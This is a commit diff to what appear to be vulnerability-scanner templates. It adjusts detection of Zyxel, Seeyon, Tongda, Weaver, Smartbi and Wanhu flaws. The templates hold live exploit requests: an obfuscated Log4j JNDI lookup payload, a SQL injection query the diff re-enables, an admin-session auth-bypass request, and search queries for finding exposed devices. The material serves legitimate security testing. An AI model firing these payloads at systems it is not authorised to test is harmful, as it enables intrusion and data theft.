template update

http/cves/2022/CVE-2022-0342.yaml

@@ -6,10 +6,13 @@ info:
   severity: critical
   description: |
      An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
+  reference:
+    - https://github.com/gobysec/GobyVuls/blob/3dbd252ebd78dfadf3fa6d99abfbbba79908d6e3/CVE-2022-0342.md?plain=1
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0342
   metadata:
     max-request: 1
-    fofa-query: app="ZyXEL-USG-FLEX"
     verified: true
+    fofa-query: body="/2FA-access.cgi" && body="zyxel zyxel_style1"
   tags: cve,cve2022,zyxel,auth-bypass,router
 
 http:
@@ -22,11 +25,15 @@ http:
       - type: word
         words:
           - "interface-name"
+          - "saved at"
+        condition: and
 
       - type: word
         part: header
         words:
           - "text/zyxel"
+          - "attachment; filename="
+        condition: and
 
       - type: status
         status:

http/default-logins/d-link/dlink-ac-centralized-management-system-default-login.yaml → http/default-logins/d-link/dlink-centralized-default-login.yaml

@@ -1,4 +1,4 @@
-id: dlink-ac-centralized-management-system-default-login
+id: dlink-centralized-default-login
 
 info:
   name: D-Link AC Centralized Management System - Default Login

http/default-logins/smartbi/smartbi-default-login.yaml

@@ -44,6 +44,8 @@ http:
         part: body
         words:
           - '"result":true'
+          - '"retCode":0'
+        condition: and
 
       - type: word
         part: header

http/vulnerabilities/other/aic-intelligent-password-leak.yaml → http/vulnerabilities/other/aic-intelligent-password-exposure.yaml

@@ -1,7 +1,7 @@
-id: aic-intelligent-password-leak
+id: aic-intelligent-password-exposure
 
 info:
-  name: AIC Intelligent Campus System - Password Leak
+  name: AIC Intelligent Campus System - Password Exposure
   author: SleepingBag945
   severity: medium
   description: |

http/vulnerabilities/other/seeyon-oa-log4j.yaml

@@ -17,8 +17,8 @@ info:
     cwe-id: CWE-77
   metadata:
     max-request: 1
-    fofa-query: app="致远互联-OA"
     verified: true
+    fofa-query: app="致远互联-OA"
   tags: cve,cve2021,rce,jndi,log4j,seeyon-oa,kev,oast
 
 http:
@@ -30,18 +30,11 @@ http:
 
         authorization=&login.timezone=GMT+8:00&province=&city=&rectangle=&login_username=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://{{interactsh-url}}}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "dns"
-
-      - type: word
-        part: location
-        words:
-          - "/seeyon/main.do"
-
-      - type: status
-        status:
-          - 302
+      - type: dsl
+        dsl:
+          - "len(body) == 0"
+          - "status_code == 302"
+          - 'contains(interactsh_protocol, "dns")'
+          - "contains(tolower(header), '/seeyon/main.do')"
+        condition: and

http/vulnerabilities/seeyon/seeyon-config-infoleak.yaml → http/vulnerabilities/seeyon/seeyon-config-exposure.yaml

@@ -1,7 +1,7 @@
-id: seeyon-config-infoleak
+id: seeyon-config-exposure
 
 info:
-  name: Seeyon OA A6 config.jsp - Information Leakage
+  name: Seeyon OA A6 config.jsp - Information Disclosure
   author: SleepingBag945
   severity: medium
   description: |

http/vulnerabilities/seeyon/seeyon-createmysql-infoleak.yaml → http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml

@@ -1,7 +1,7 @@
-id: seeyon-createmysql-infoleak
+id: seeyon-createmysql-exposure
 
 info:
-  name: Seeyon OA A6 createMysql.jsp Database - Information Leakage
+  name: Seeyon OA A6 createMysql.jsp Database - Information Disclosure
   author: SleepingBag945
   severity: medium
   description: |

http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml

@@ -1,7 +1,7 @@
-id: seeyon-oa-initdataassess-infoleak
+id: seeyon-initdata-exposure
 
 info:
-  name: Seeyon OA A6 initDataAssess.jsp - Information Leakage
+  name: Seeyon OA A6 initDataAssess.jsp - Information Disclosure
   author: SleepingBag945
   severity: medium
   description: |

http/vulnerabilities/smartbi/smartbi-deserialization.yaml

@@ -36,7 +36,7 @@ http:
       - type: word
         part: body
         words:
-          - 'H~CxOm~'
+          - '"H~CxOm~"'
 
       - type: word
         part: header

http/vulnerabilities/tongda/tongda-api-arbitrary-file-upload.yaml → http/vulnerabilities/tongda/tongda-api-file-upload.yaml

@@ -1,4 +1,4 @@
-id: tongda-api-arbitrary-file-upload
+id: tongda-api-file-upload
 
 info:
   name: Tongda OA v11.8 api.ali.php - Arbitrary File Upload
@@ -12,7 +12,7 @@ info:
     max-request: 1
     fofa-query: app="TDXK-通达OA"
     verified: true
-  tags: tongda,oa
+  tags: tongda,oa,fileupload
 
 http:
   - raw:
@@ -43,5 +43,5 @@ http:
       - type: dsl
         dsl:
           - 'status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200'
-          - 'contains(body_2,"OK") && contains(body_3,"phpinfo")'
+          - 'contains(body_2,"+OK") && contains(body_3,"phpinfo")'
         condition: and

http/vulnerabilities/tongda/tongda-report-bi-func-sqli.yaml → http/vulnerabilities/tongda/tongda-report-func-sqli.yaml

@@ -1,4 +1,4 @@
-id: tongda-report-bi-func-sqli
+id: tongda-report-func-sqli
 
 info:
   name: Tongda OA v11.6 report_bi.func.php - SQL injection
@@ -10,8 +10,8 @@ info:
     - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20report_bi.func.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
   metadata:
     max-request: 1
-    fofa-query: app="TDXK-通达OA"
     verified: true
+    fofa-query: app="TDXK-通达OA"
   tags: tongda,sqli
 
 http:
@@ -27,8 +27,9 @@ http:
     matchers:
       - type: word
         words:
-          - "root@"
-          - "para"
+          - '"root@'
+          - '"para":'
+          - '"td_oa"'
         condition: and
 
       - type: status

http/vulnerabilities/tongda/tongda-v2017-video-file-read.yaml → http/vulnerabilities/tongda/tongda-video-file-read.yaml

@@ -1,4 +1,4 @@
-id: tongda-v2017-video-file-read
+id: tongda-video-file-read
 
 info:
   name: Tongda OA V2017 Video File - Arbitrary File Read

http/vulnerabilities/wanhu/wanhu-oa-teleconferenceservice-xxe-inject.yaml → http/vulnerabilities/wanhu/wanhu-teleconferenceservice-xxe.yaml

@@ -1,7 +1,7 @@
-id: wanhu-oa-teleconferenceservice-xxe
+id: wanhu-teleconferenceservice-xxe
 
 info:
-  name: Wanhu OA TeleConferenceService Interface - XXE
+  name: Wanhu OA TeleConferenceService Interface - XML External Entity Injection
   author: SleepingBag945
   severity: high
   description: |
@@ -34,11 +34,13 @@ http:
           - "dns"
 
       - type: word
-        part: header
+        part: body
         words:
-          - "text/xml"
+          - "<response>"
+          - "<retcode>"
+        condition: and
 
       - type: word
-        part: body
+        part: header
         words:
-          - "retcode>"
+          - "text/xml"

http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml

@@ -4,7 +4,8 @@ info:
   name: Weaver e-cology verifyquicklogin.jsp - Auth Bypass
   author: SleepingBag945
   severity: high
-  description: There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package.
+  description: |
+    There is an arbitrary administrator login vulnerability in the Panwei OA E-Cology VerifyQuickLogin.jsp file. An attacker can obtain the administrator Session by sending a special request package.
   reference:
     - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
   metadata:
@@ -16,10 +17,7 @@ http:
       - |
         POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-        Accept: */*
         Content-Type: application/x-www-form-urlencoded
-        Accept-Encoding: gzip
 
         identifier=1&language=1&ipaddress=x.x.x.x
 
@@ -29,11 +27,8 @@ http:
         part: body
         words:
           - "\"sessionkey\":"
-
-      - type: word
-        part: body
-        words:
           - "\"message\":"
+        condition: and
 
       - type: status
         status:

http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml

@@ -12,8 +12,8 @@ info:
     - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml
   metadata:
     max-request: 1
-    fofa-query: app="泛微-协同办公OA"
     verified: true
+    fofa-query: app="泛微-协同办公OA"
   tags: weaver,ecology,sqli
 
 http:
@@ -25,6 +25,6 @@ http:
       - type: dsl
         dsl:
           - "status_code == 200"
-          - "contains(header, 'application/json')"
-          - "contains(body, 'system error') && !contains(body, 'securityIntercept')"
+          - "contains_all(header, 'application/json','ecology_')"
+          - "contains(body, 'error\":\"system error') && !contains(body, 'securityIntercept')"
         condition: and

http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml

@@ -21,7 +21,7 @@ variables:
 http:
   - method: GET
     path:
-  #    - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
+      - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','{{num}}')),3,32)"
       - "{{BaseURL}}/Api/portal/elementEcodeAddon/getSqlData?sql="
 
     stop-at-first-match: true

http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml

@@ -1,7 +1,7 @@
-id: weaver-mysql-config-info-leak
+id: weaver-mysql-config-exposure
 
 info:
-  name: OA E-Office mysql_config.ini - Database Information Leakage
+  name: OA E-Office mysql_config.ini - Information Disclosure
   author: SleepingBag945
   severity: high
   description: |
@@ -24,5 +24,5 @@ http:
         dsl:
           - 'status_code == 200'
           - 'contains(header,"text/plain")'
-          - 'contains(body,"datapassword") && contains(body, "datauser")'
+          - 'contains_all(body,"datapassword", "datauser")'
         condition: and